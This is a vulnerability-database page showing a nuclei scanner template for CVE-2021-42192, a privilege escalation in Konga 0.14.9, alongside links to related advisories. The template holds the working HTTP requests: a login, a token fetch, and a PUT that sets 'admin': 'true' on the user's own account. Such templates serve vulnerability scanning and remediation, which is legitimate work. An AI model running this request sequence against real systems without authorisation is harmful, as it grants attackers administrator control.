Lucene search
K

KONGA 0.14.9 - Privilege Escalation

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 121 Views

KONGA 0.14.9 Privilege Escalation allows attackers to escalate privileges and gain unauthorized access to sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Incorrect Authorization in Konga_Project Konga
15 Oct 202120:19
githubexploit
ATTACKERKB
CVE-2021-42192
4 May 202211:15
attackerkb
Circl
CVE-2021-42192
4 May 202214:34
circl
CNNVD
KONGA 安全漏洞
4 May 202200:00
cnnvd
CVE
CVE-2021-42192
4 May 202200:00
cve
Cvelist
CVE-2021-42192
4 May 202200:00
cvelist
NVD
CVE-2021-42192
4 May 202211:15
nvd
Prion
Privilege escalation
4 May 202211:15
prion
Positive Technologies
PT-2022-11555 · Konga · Konga
4 May 202200:00
ptsecurity
RedhatCVE
CVE-2021-42192
22 May 202518:46
redhatcve
Rows per page
id: CVE-2021-42192

info:
  name: KONGA 0.14.9 - Privilege Escalation
  author: rschio
  severity: high
  description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade to a patched version of KONGA or apply the necessary security patches provided by the vendor.
  reference:
    - http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
    - https://www.exploit-db.com/exploits/50521
    - hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
    - https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing
    - https://github.com/pantsel/konga/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-42192
    cwe-id: CWE-863
    epss-score: 0.09919
    epss-percentile: 0.95013
    cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: konga_project
    product: konga
  tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project,vuln

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"password": "{{password}}", "identifier": "{{username}}"}
      - |
        POST /api/user/{{id}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/json;charset=utf-8

        {"token": "{{token}}"}
      - |
        PUT /api/user/{{id}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/json;charset=utf-8

        {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "\"admin\":false")
          - contains(body_3, "\"admin\":true")
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: id
        group: 1
        regex:
          - '"id":([0-9]+)'
        internal: true
        part: body

      - type: regex
        name: token
        group: 1
        regex:
          - '"token":"(.*)"'
        internal: true
        part: body
# digest: 4a0a0047304502205dabb41ceae502f7709e4c6af46f17d3e6a6072be451cb42b7b1fcd76640ee4e022100de7b2787db2659ded15cc1ae3c70c5eeb69a59772fbec203446c1f1510ff1b3b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.18.8
CVSS 29
EPSS0.09919
121